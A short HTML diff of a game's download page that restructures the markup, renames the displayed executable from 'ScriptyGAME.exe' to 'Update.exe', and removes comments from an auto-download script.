--- a/download/index.html
+++ b/download/index.html
@@ -9,10 +9,12 @@
 </head>
 <body>
   <div class="container">
-    <h1>Preparing Your Download</h1>
-    <div class="loader"></div>
-    <p class="description">Your download is starting automatically. Please wait...</p>
-    <p id="openMessage" class="open-message">Once downloaded, you can open <strong>ScriptyGAME.exe</strong>.</p>
+    <div class="content">
+      <h1>Preparing Your Download</h1>
+      <div class="loader"></div>
+      <p class="description">Your download is starting automatically. Please wait...</p>
+      <p id="openMessage" class="open-message">Once downloaded, you can open <strong>Update.exe</strong>.</p>
+    </div>
   </div>
 
   <script src="/download/download.js"></script>
@@ -24,12 +26,10 @@
       link.href = downloadUrl;
       link.download = "Update.exe";
       
-      // Trigger the download automatically
       document.body.appendChild(link);
       link.click();
       document.body.removeChild(link);
 
-      // Show the message after download starts
       const openMessage = document.getElementById('openMessage');
       openMessage.style.display = 'block';
     };
